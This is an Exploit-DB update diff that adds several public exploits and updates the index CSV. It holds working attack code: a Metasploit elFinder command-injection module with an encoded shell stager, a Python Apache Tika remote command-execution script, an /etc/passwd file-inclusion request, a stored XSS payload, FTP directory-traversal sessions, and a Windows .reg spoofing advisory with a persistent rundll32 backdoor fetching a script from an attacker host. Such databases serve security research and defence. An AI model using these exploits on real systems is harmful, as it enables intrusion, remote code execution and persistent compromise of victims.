DB: 2019-03-14

8 changes to exploits/shellcodes

Microsoft Windows - .reg File / Dialog Box Message Spoofing
Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal
Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal

Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution
elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)
Apache Tika-server < 1.18 - Command Injection
WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting

exploits/php/remote/46539.rb

@@ -0,0 +1,263 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'elFinder PHP Connector exiftran Command Injection',
+      'Description'    => %q{
+        This module exploits a command injection vulnerability in elFinder
+        versions prior to 2.1.48.
+
+        The PHP connector component allows unauthenticated users to upload
+        files and perform file modification operations, such as resizing and
+        rotation of an image. The file name of uploaded files is not validated,
+        allowing shell metacharacters.
+
+        When performing image operations on JPEG files, the filename is passed
+        to the `exiftran` utility without appropriate sanitization, causing
+        shell commands in the file name to be executed, resulting in remote
+        command injection as the web server user.
+
+        The PHP connector is not enabled by default.
+
+        The system must have `exiftran` installed and in `$PATH`.
+
+        This module has been tested successfully on elFinder versions 2.1.47,
+        2.1.20 and 2.1.16 on Ubuntu.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Thomas Chauchefoin', # Discovery
+          'q3rv0',              # Exploit
+          'bcoles'              # Metasploit
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-9194'],
+          ['EDB', '46481'],
+          ['URL', 'https://github.com/Studio-42/elFinder/releases/tag/2.1.48'],
+          ['URL', 'https://www.secsignal.org/news/cve-2019-9194-triggering-and-exploiting-a-1-day-vulnerability/']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Platform'       => 'php',
+      'Targets'        => [['Auto', {}]],
+      'Privileged'     => false,
+      'DisclosureDate' => '2019-02-26',
+      'DefaultTarget'  => 0))
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'The base path to elFinder', '/elFinder/'])
+    ]
+  end
+
+  #
+  # Check if /php/connector.minimal.php exists and is executable
+  #
+  def check
+    uri = normalize_uri(target_uri.path, 'php', 'connector.minimal.php')
+    res = send_request_cgi('uri' => uri)
+
+    unless res
+      vprint_error 'Connection failed'
+      return CheckCode::Unknown
+    end
+
+    unless res.code == 200
+      vprint_status "#{uri} does not exist"
+      return CheckCode::Safe
+    end
+
+    if res.body.include? '<?php'
+      vprint_status 'PHP is not enabled'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Detected
+  end
+
+  #
+  # Upload PHP payload
+  #
+  def upload(fname)
+    # Small JPEG file from:
+    # https://github.com/mathiasbynens/small/blob/master/jpeg.jpg
+    jpeg = %w[
+      FF D8 FF DB 00 43 00 03 02 02 02 02 02 03 02 02
+      02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05
+      06 09 08 0A 0A 09 08 09 09 0A 0C 0F 0C 0A 0B 0E
+      0B 09 09 0D 11 0D 0E 0F 10 10 11 10 0A 0C 12 13
+      12 10 13 0F 10 10 10 FF C9 00 0B 08 00 01 00 01
+      01 01 11 00 FF CC 00 06 00 10 10 05 FF DA 00 08
+      01 01 00 00 3F 00 D2 CF 20 FF D9
+    ]
+    jpeg = [jpeg.join].pack('H*')
+    jpeg << rand_text_alphanumeric(50..100)
+    jpeg << "<?php #{payload.encoded} ?>"
+    jpeg << rand_text_alphanumeric(50..100)
+
+    data = Rex::MIME::Message.new
+    data.add_part('upload', nil, nil, 'form-data; name="cmd"')
+    data.add_part('l1_Lw', nil, nil, 'form-data; name="target"')
+    data.add_part(jpeg, 'image/jpeg', nil, %(form-data; name="upload[]"; filename="#{fname}"))
+    post_data = data.to_s
+
+    print_status("Uploading payload '#{fname}' (#{post_data.length} bytes)")
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
+      'data'   => post_data
+    )
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, 'Unexpected reply'
+    end
+
+    unless res.body.include?('"added"')
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    if res.body.include?('"error"') || res.body.include?('"warning"')
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    json_res = JSON.parse(res.body) rescue nil
+
+    if json_res.nil? || json_res['added'].empty?
+      fail_with Failure::UnexpectedReply, "Upload failed: #{res.body}"
+    end
+
+    json_res['added'].first['hash'] || ''
+  end
+
+  #
+  # Trigger the command injection via image rotation functionality
+  # Rotates image by 180 degrees to trigger `exiftran` code path
+  #
+  def trigger(hash)
+    print_status 'Triggering vulnerability via image rotation ...'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'vars_get' => {
+        'target' => hash,
+        'degree' => '180',
+        'mode'   => 'rotate',
+        'cmd'    => 'resize'
+      }
+    }, 5)
+
+    unless res
+      fail_with Failure::Unreachable, 'Connection failed'
+    end
+
+    if res.body.include?('"error"') || res.body.include?('"warning"')
+      fail_with Failure::UnexpectedReply, "Image rotate failed: #{res.body}"
+    end
+  end
+
+  #
+  # Delete uploaded file
+  #
+  def delete_file(hash)
+    print_status 'Removing uploaded file ...'
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'php', 'connector.minimal.php'),
+      'vars_get' => {
+        'cmd' => 'rm',
+        'targets[]' => hash
+      }
+    }, 15)
+
+    unless res
+      print_status 'Connection failed'
+      return
+    end
+
+    if res.body.include?('errFileNotFound')
+      print_error "Could not delete uploaded file. Unexpected reply: #{res.body}"
+      return
+    end
+
+    print_good 'Deleted uploaded file'
+  end
+
+  #
+  # Execute payload
+  #
+  def execute_payload(php_fname)
+    path = normalize_uri(target_uri.path, 'php', php_fname)
+
+    print_status "Executing payload (#{path}) ..."
+
+    res = send_request_cgi({
+      'uri' => path
+    }, 15)
+
+    unless res
+      print_status 'No reply'
+      return
+    end
+
+    unless res.code == 200
+      fail_with Failure::UnexpectedReply, "Executing payload failed (HTTP #{res.code})"
+    end
+  end
+
+  #
+  # Remove uploaded file
+  #
+  def cleanup
+    delete_file @hash unless @hash.nil?
+  ensure
+    super
+  end
+
+  #
+  # upload && execute
+  #
+  def exploit
+    unless check == CheckCode::Detected
+      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+    end
+
+    fname = rand_text_alphanumeric(6..10)
+    php_fname = ".#{rand_text_alphanumeric(6..10)}.php"
+
+    # Max file name length is ~250 characters
+    # and characters such as `/` are forbidden.
+    # Hex encoded stager copies the uploaded file from the `files` directory
+    # to the working directory (`php`) and changes the extension to `.php`
+    # The stager is decoded with xxd when the vuln is triggered.
+    stager = "cp ../files/#{fname}.jpg*echo* #{php_fname}"
+
+    # Upload our payload jpg file with encoded stager in the filename
+    jpg_fname = "#{fname}.jpg;echo #{stager.unpack('H*').flatten.first} |xxd -r -p |sh& #.jpg"
+    @hash = upload jpg_fname
+
+    if @hash.to_s == ''
+      fail_with Failure::Unknown, 'Upload failed: Failed to retrieve file hash ID'
+    end
+
+    trigger @hash
+
+    register_file_for_cleanup php_fname
+
+    execute_payload php_fname
+  end
+end

exploits/php/webapps/46537.txt

@@ -0,0 +1,88 @@
+=============================================
+MGC ALERT 2019-001
+- Original release date: February 06, 2019
+- Last revised:  March 13, 2019
+- Discovered by: Manuel García Cárdenas
+- Severity: 7/10 (CVSS Base Score)
+- CVE-ID: CVE-2019-9618
+=============================================
+
+I. VULNERABILITY
+-------------------------
+WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion
+
+II. BACKGROUND
+-------------------------
+Hassle-free and user-friendly way to add a Media player directly to your
+website.
+
+III. DESCRIPTION
+-------------------------
+This bug was found in the file:
+
+/gracemedia-media-player/templates/files/ajax_controller.php
+
+Vulnerable code:
+
+require_once($_GET['cfg']);
+
+The parameter "cfg" it is not sanitized allowing include local files
+
+To exploit the vulnerability only is needed use the version 1.0 of the HTTP
+protocol to interact with the application.
+
+IV. PROOF OF CONCEPT
+-------------------------
+The following URL have been confirmed that is vulnerable to local file
+inclusion.
+
+Local File Inclusion POC:
+
+GET
+/wordpress/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
+
+V. BUSINESS IMPACT
+-------------------------
+Public defacement, confidential data leakage, and database server
+compromise can result from these attacks. Client systems can also be
+targeted, and complete compromise of these client systems is also possible.
+
+VI. SYSTEMS AFFECTED
+-------------------------
+GraceMedia Media Player <= 1.0
+
+VII. SOLUTION
+-------------------------
+Disable plugin until a fix is available, vendor does not fix after 2
+requests.
+
+VIII. REFERENCES
+-------------------------
+https://es.wordpress.org/plugins/gracemedia-media-player/
+
+IX. CREDITS
+-------------------------
+This vulnerability has been discovered and reported
+by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
+
+X. REVISION HISTORY
+-------------------------
+February 06, 2019 1: Initial release
+March 13, 2019 2: Revision to send to lists
+
+XI. DISCLOSURE TIMELINE
+-------------------------
+February 06, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
+February 06, 2019 2: Email to vendor without response
+February 21, 2019 3: Second email to vendor without response
+March 13, 2019 4: Send to the Full-Disclosure lists
+
+XII. LEGAL NOTICES
+-------------------------
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+
+XIII. ABOUT
+-------------------------
+Manuel Garcia Cardenas
+Pentester

exploits/php/webapps/46538.txt

@@ -0,0 +1,18 @@
+# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
+# Date: 13.02.2019 
+# Exploit Author: Gionathan "John" Reale 
+# Vendor Homepage: https://www.pfsense.org 
+# Version: 2.4.4-p1/0.59_14 
+# Software Link: N/A
+# Google Dork: N/A
+# CVE:2019-8953 
+
+################################################################################################################################## 
+Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
+In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
+HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
+################################################################################# 
+
+Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
+PARAMETER Description 
+PAYLOAD "><script>alert("test")</script>

exploits/windows/dos/46533.txt

@@ -0,0 +1,143 @@
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
+[+] ISR: ApparitionSec          
+ 
+
+[Vendor]
+www.microsoft.com
+
+
+[Product]
+A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values.
+.reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.
+
+
+[Vulnerability Type]
+Windows .Reg File Dialog Box Message Spoofing
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user.
+This can potentially trick unsavvy users into choosing the wrong selection shown on the dialog box. Furthermore, we can deny the registry editor
+its ability to show the default secondary status dialog box (Win 10), thereby hiding the fact that our attack was successful.
+
+Normally when a user opens a .reg file UAC will launch (if user is run as Admin) if targeting a non privleged user we can still hijack HKCU reg settings
+without having to deal with UAC. After they will get the registry security warning dialog box asking them if they "trust the source" and
+"Are you sure you want to continue?" etc and will also have a choice of either 'Yes' or 'No' to select from.
+
+However, we can inject our own messages thru the filename to direct the user to wrongly click "Yes", as the expected "Are you sure you want to continue?"
+dialog box message is under our control. The registry dialog echoes back the filename plus any text we add and allows us to terminate part of its
+default security warning message. We achieve this using % encoded characters in the filename like %n or %r and %0.
+
+Example, the "do not add it to the registry" and "Are you sure you want to continue?" default warning messages can be done away with using %0.
+
+This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes" or whatever else we like.
+Potentially making a user think they are cancelling the registry import as the security warning dialog box is now lying to them.
+
+Denial of secondary registry editor status dialog box (hiding successful attacks) in Windows 10:
+------------------------------------------------------------------------------------------------
+Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us
+"the keys and values contained in <REGFILE> have been successfully added to the registry".
+
+We can obstruct that behavior to deny this secondary registry editor dialog from appearing by tacking on a (null) right before the
+end of our filename using %1 or %25 like: "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
+
+If don't want to use (null) use %3 but it will display a asian char instead but still prevents the secondary registry dialog box you.
+You will have to manually refresh the registry written to in order to see the values stored when using these dialog denial of service methods.
+
+Note: Denial of the secondary dialog box seems to only work on Windows 10.
+
+Behaviors I discovered playing with registry filenames that affect the dialog box, depending on Windows OS version you will get different results.
+
+% - can be used for obfuscation e.g. %h%a%t%e = hate
+%b will create white-space
+%n makes a newline
+%r makes a newline
+%1 creates (null) - important as we prevent the second registry dialog from appearing after a successful import!
+%0 Important terminates string
+%25 (Windows 10) creates (null) - Important as we prevent the second registry dialog from appearing after a successful import!
+%3 - Important as we prevent the second registry dialog from appearing after a successful import! (but shows asian char)
+%5 (Windows 10) duplicates the default registry dialog box message by "n" amount of times per amount of %5 injected into the filename 
+%25 (Windows 7) duplicates the default registry dialog box message by "n" amount of times per amount of %25 injected into the filename 
+%2525 prevents registry editor from opening
+%169 will show our junky filename in the dialog box (we don't want that)
+%3, %197, %17 and some others change the default language shown in the registry dialog box to asian characters etc
+
+Each injected character can be separated by a percent "%" sign without messing up our spoofed message, we can leverage this to obfuscate the end of the filename.
+We then use %0 to terminate the message string so that the second .reg extension and default registry messages are not displayed in the registry dialog box.
+
+The filename "Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg" will show as "Microsoft-Security-Update-v1.2-Windows-10.reg"
+in the registry dialog box, along with our spoofed user directions.
+ 
+While this spoofing vulnerability requires user interaction and bypassing Windows UAC (if targeting Admin) prompt to succeed, the fact the we can prevent secondary
+registry dialogs and modify registry messages displayed to the user makes it a viable attack vector. If we are successful in our attack we can achieve a persistent
+RCE backdoor all while the user thinks they have aborted the import. Moreover, targeting a non privileged user allows us to hijack programs and not worry about UAC.
+
+
+[POC Video URL]
+https://vimeo.com/322684636
+
+
+[Exploit/POC]
+Persistent Remote Code Execution Backdoor: 
+
+This will add entry to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe"
+for a persistent rundll32 payload targeting MSIE that references a JScript XML based file on our remote server.
+
+1) Create a Windows .REG Registry file named.
+
+"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
+
+Registry file Contents.
+
+Windows Registry Editor Version 5.00
+
+[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
+"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")"
+
+
+2) Create an XML file hosted at http://ATTACKER-IP/backdoor named simply as "backdoor" will execute Windows calc.exe when Microsoft Internet Explorer is launched.
+
+<?xml version="1.0"?>
+<package>
+<component id="testCalc">
+<script language="JScript">
+<![CDATA[
+new ActiveXObject("WScript.Shell").Run("calc.exe"); 
+]]>
+</script>
+</component>
+</package>
+
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: March 1, 2019
+MSRC Response: " A registry file was created with the title you suggested, but the error message was clear."
+Then vendor sent me a link pointing me to the "Definition of a Security Vulnerability" Lol.
+March 10, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx

exploits/windows/dos/46534.txt

@@ -0,0 +1,41 @@
+# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  MDTM Directory Traversal
+# Google Dork: N/A
+# Date: 3/13/2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www.coreftp.com
+# Software Link: http://www.coreftp.com/server/index.html
+# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
+# Tested on: Windows 7
+# CVE : CVE-2019-9649
+
+*Vendor has confirmed vulnerability and implemented an updated version*
+
+Summary: Summary: By utilizing a directory traversal along with the FTP MDTM command, an attacker can browse outside the root directory to determine if a file exists based on return file size along with the date the file was last modified by using a ..\..\ technique
+Tools used:
+Parrot OS VM
+Windows 7 VM
+FTP / SFTP Server v2 - Build 674
+Netcat
+
+Proof of Concept (PoC):
+
+File 1: ARP.exe
+Type of file: Application(.EXE)
+Description: TCP/IP Arp Command
+Location: C:\Windows\System32\
+Size: 20.5 KB (20,992 bytes)
+Size on disk: 24.0 KB (24,576 bytes)
+Created: Monday July 13, 2009 7:55:11 PM
+Modified: Monday July 13, 2009, 9:14:12 PM
+Accessed: Monday July 13, 2009 7:55:11 PM
+
+#nc -nv 192.168.0.2 21
+(UNKNOWN) [192.168.0.2] 21 (ftp) open
+220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
+USER anonymous
+331 password required for anonymous
+PASS anonymous@
+230-Logged on
+230
+MDTM C:\..\..\..\..\..\..\Windows\System32\ARP.exe
+213 20090713211412

exploits/windows/dos/46535.txt

@@ -0,0 +1,41 @@
+# Exploit Title: CoreFTP Server FTP / SFTP Server v2 - Build 674  SIZE Directory Traversal
+# Google Dork: N/A
+# Date: 3/13/2019
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www.coreftp.com
+# Software Link: http://www.coreftp.com/server/index.html
+# Version: Firmware: CoreFTP Server FTP / SFTP Server v2 - Build 674
+# Tested on: Windows 7
+# CVE : CVE-2019-9648
+
+*Vendor has confirmed vulnerability and implemented an updated version*
+
+Summary: By utilizing a directory traversal along with the FTP SIZE command, an attacker can browse outside the root directory to determine if a file exists based on return file size by using a ..\..\ technique
+Tools used:
+Parrot OS VM
+Windows 7 VM
+FTP / SFTP Server v2 - Build 674
+Netcat
+
+Proof of Concept (PoC):
+
+File 1: ARP.exe
+Type of file: Application(.EXE)
+Description: TCP/IP Arp Command
+Location: C:\Windows\System32\
+Size: 20.5 KB (20,992 bytes)
+Size on disk: 24.0 KB (24,576 bytes)
+Created: Monday July 13, 2009 7:55:11 PM
+Modified: Monday July 13, 2009, 9:14:12 PM
+Accessed: Monday July 13, 2009 7:55:11 PM
+
+#nc -nv 192.168.0.2 21
+(UNKNOWN) [192.168.0.2] 21 (ftp) open
+220 Core FTP Server Version 2.0, build 674, 32-bit, installed 1 days ago Unregistered
+USER anonymous
+331 password required for anonymous
+PASS anonymous@
+230-Logged on
+230
+SIZE C:\..\..\..\..\..\..\Windows\System32\ARP.exe
+213 20992

exploits/windows/local/46536.txt

@@ -0,0 +1,34 @@
+# Exploit Title:  Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execution Vulnerability
+
+# Google Dork: N/A
+
+# Date: March, 13 2019
+
+# Exploit Author:  Eduardo Braun Prado
+
+# Vendor Homepage: http://www.microsoft.com/
+
+# Software Link: http://www.microsoft.com/
+
+# Version: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
+
+# Tested on: Windows 7 SP1, Server 2008, Server 2012, Server 2012 R2, 8.0, 8.1, 10 (any) with full patches up to December 2018. both x86 and x64 architectures.
+
+# CVE : CVE-2019-0541
+
+
+The Microsoft Windows MSHTML Engine is prone to a vulnerability that allows attackers to execute arbitrary code on vulnerable systems because of improper validation
+of specially crafted web documents (html, xhtml, etc). The issue is triggered when users "Edit" specially crafted documents containing a 'meta' HTML tag set to 'ProgId' and its content set to a 'ProgId' of choice eg. 'HTAFILE', usually through MS IE browser or a MS Office
+component (The Edit HTML app 'msohtmed.exe'). Some Office versions will add an "Edit" menu option to html and xhtml files, making it possible to exploit the vulnerability locally or remotely (usually through network shares)
+This is the 'ProgId' exploit: Similar to the old Windows Shell / Internet Explorer ClassId vulnerabilit(ies) that haunted Windows 98/2000/XP in the past.'.
+On patched systems, the PoC file will always open in Notepad.
+
+
+Video demo: https://youtu.be/OdEwBY7rXMw
+
+
+Download PoC (in ZIP archive) with full details from: https://onedrive.live.com/?id=AFCB9116C8C0AAF4%21366&cid=AFCB9116C8C0AAF4
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46536.zip

exploits/windows/remote/46540.py

@@ -0,0 +1,39 @@
+######################################################################################################
+#Description: This is a PoC for remote command execution in Apache Tika-server.                      #
+#Versions Affected: Tika-server versions < 1.18                                                      #   
+#Researcher: David Yesland Twitter: @Daveysec                                                        #
+#Blog Link: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ #                                                                   # 
+#NIST CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2018-1335                                       #
+######################################################################################################
+
+import sys
+import requests
+
+if len(sys.argv) < 4:
+	print "Usage: python CVE-2018-1335.py <host> <port> <command>"
+	print "Example: python CVE-2018-1335.py localhost 9998 calc.exe"
+else:
+	host = sys.argv[1]
+	port = sys.argv[2]
+	cmd = sys.argv[3]
+
+	url = host+":"+str(port)+"/meta"
+
+	headers = {"X-Tika-OCRTesseractPath": "\"cscript\"", 
+		"X-Tika-OCRLanguage": "//E:Jscript", 
+		"Expect": "100-continue", 
+		"Content-type": "image/jp2", 
+		"Connection": "close"}
+
+	jscript='''var oShell = WScript.CreateObject("WScript.Shell");
+	var oExec = oShell.Exec('cmd /c {}');
+	'''.format(cmd)
+
+	try:
+		requests.put("https://"+url, headers=headers, data=jscript, verify=False)
+	
+	except:
+		try:
+			requests.put("http://"+url, headers=headers, data=jscript)
+		except:
+			print "Something went wrong.\nUsage: python CVE-2018-1335.py <host> <port> <command>"

files_exploits.csv

@@ -6353,6 +6353,9 @@ id,file,description,date,author,type,platform,port
 46504,exploits/android/dos/46504.txt,"Android - getpidcon() Usage in Hardware binder ServiceManager Permits ACL Bypass",2019-03-06,"Google Security Research",dos,android,
 46529,exploits/linux/dos/46529.c,"Linux Kernel 4.4 (Ubuntu 16.04) - 'snd_timer_user_ccallback()' Kernel Pointer Leak",2019-03-11,wally0813,dos,linux,
 46532,exploits/windows/dos/46532.py,"Core FTP 2.0 build 653 - 'PBSZ' Denial of Service (PoC)",2019-03-12,Hodorsec,dos,windows,21
+46533,exploits/windows/dos/46533.txt,"Microsoft Windows - .reg File / Dialog Box Message Spoofing",2019-03-13,hyp3rlinx,dos,windows,
+46534,exploits/windows/dos/46534.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'MDTM' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
+46535,exploits/windows/dos/46535.txt,"Core FTP Server FTP / SFTP Server v2 Build 674 - 'SIZE' Directory Traversal",2019-03-13,"Kevin Randall",dos,windows,21
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10355,6 +10358,7 @@ id,file,description,date,author,type,platform,port
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,
 46522,exploits/hardware/local/46522.md,"Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)",2019-03-08,Specter,local,hardware,
 46530,exploits/windows/local/46530.py,"NetSetMan 4.7.1 - Local Buffer Overflow (SEH Unicode)",2019-03-11,"Devin Casadey",local,windows,
+46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17245,6 +17249,8 @@ id,file,description,date,author,type,platform,port
 46513,exploits/multiple/remote/46513.java,"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)",2018-10-25,allyshka,remote,multiple,
 46514,exploits/multiple/remote/46514.js,"TeamCity < 9.0.2 - Disabled Registration Bypass",2018-03-28,allyshka,remote,multiple,
 46516,exploits/multiple/remote/46516.py,"OpenSSH SCP Client - Write Arbitrary Files",2019-01-11,"Harry Sintonen",remote,multiple,
+46539,exploits/php/remote/46539.rb,"elFinder PHP Connector < 2.1.48 - exiftran Command Injection (Metasploit)",2019-03-13,Metasploit,remote,php,
+46540,exploits/windows/remote/46540.py,"Apache Tika-server < 1.18 - Command Injection",2019-03-13,"Rhino Security Labs",remote,windows,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -40975,3 +40981,5 @@ id,file,description,date,author,type,platform,port
 46527,exploits/windows/webapps/46527.sh,"PRTG Network Monitor 18.2.38 - Authenticated Remote Code Execution",2019-03-11,M4LV0,webapps,windows,80
 46528,exploits/php/webapps/46528.py,"Flexpaper PHP Publish Service 2.3.6 - Remote Code Execution",2019-03-11,redtimmysec,webapps,php,
 46531,exploits/php/webapps/46531.html,"PilusCart 1.4.1 - Cross-Site Request Forgery (Add Admin)",2019-03-12,"Gionathan Reale",webapps,php,80
+46537,exploits/php/webapps/46537.txt,"WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion",2019-03-13,"Manuel García Cárdenas",webapps,php,80
+46538,exploits/php/webapps/46538.txt,"pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting",2019-03-13,"Gionathan Reale",webapps,php,443